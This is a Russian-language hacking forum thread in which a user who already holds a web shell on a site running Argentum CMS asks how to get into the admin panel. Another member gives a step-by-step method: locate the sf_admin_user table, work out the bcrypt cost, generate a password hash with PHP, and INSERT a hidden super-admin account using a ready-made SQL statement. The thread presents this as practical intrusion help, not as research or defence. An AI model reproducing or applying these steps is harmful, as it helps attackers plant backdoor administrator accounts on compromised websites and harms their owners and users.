Просмотр полной версии : Argentum CMS
Unknowhacker
08.06.2015, 21:36
В общем есть шелл на данном типе движка доступ к зарегистрированным пользователям. Но данные под панель администрирования не подходят. И собственно вопрос, где хранятся данные админ пользователей данного движка?
это просто студия, которая клепает сайты. http://argentum.ua/ru/portfolio
если нет в базе, значит лежат где-нибудь в файле
Unknowhacker
09.06.2015, 15:28
Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.
Вот я зашёл сюда /.../cpanel
http://s001.radikal.ru/i195/1506/90/f1e04b4c6e7a.jpg
А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите!
P.S Данные db_user - не подходят!
↑ (https://antichat.live/posts/3857078/)
Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.
Вот я зашёл сюда
/.../cpanel
http://s001.radikal.ru/i195/1506/90/f1e04b4c6e7a.jpg
А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите!
P.S
Данные db_user - не подходят!
шелл в лс
я сначала начал искать по файлам всяческими find и grep, а потом все же решил перепроверить.
есть там такая таблица: sf_admin_user, в ней такие колонки:
id group_id username password full_name email created_at last_activity is_active is_super_admin
так вот в cpanel пускает, если is_super_admin = 1.
пароли там через функцию http://php.net/manual/ru/function.password-hash.php
ищем файл:
grep --exclude=*.o -rnw '/var/www/***/' -e "PASSWORD_BCRYPT"
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:12: define('PASSWORD_BCRYPT', 1);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:13: define('PASSWORD_DEFAULT', PASSWORD_BCRYPT);
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:38: case PASSWORD_BCRYPT:
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:159: $return['algo'] = PASSWORD_BCRYPT;
/var/www/***/plugins/sfArgentumCMSPlugin/lib/password.php:184: case PASSWORD_BCRYPT:
switch ($algo) {
casePASSWORD_BCRYPT:
$cost= isset($options['cost']) ?$options['cost'] :10;
if ($cost!=$info['options']['cost']) {
returntrue ;
bcrypt, cost = 10
генерируем пасс себе
10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>
$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816 yEvRWHFGKS
добавим себя в базу:
INSERT INTO sf_admin_user (id, group_id, username, password, full_name, email, created_at, last_activity, is_active, is_super_admin) VALUES (667, 1, "antichat1", "$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816 yEvRWHFGKS", "lol1", "lol@lol.ru1", "2010-10-10 17:29:54", "2013-04-05 22:05:38", 1, 1);
готово, логинимся: ***/cpanel/
Unknowhacker
10.06.2015, 02:04
Что-то я не понял, я создал пхп-скрипт ввёл код.
10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>
Сохраняю, обновляю страницу - белый экран. (Кодировка UTF-8)
↑ (https://antichat.live/posts/3857282/)
Что-то я не понял, я создал пхп-скрипт ввёл код.
10,
];
echo password_hash("pass", PASSWORD_BCRYPT, $options)."\n";
?>
Сохраняю, обновляю страницу - белый экран. (Кодировка UTF-8)
https://www.dailycred.com/article/bcrypt-calculator
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot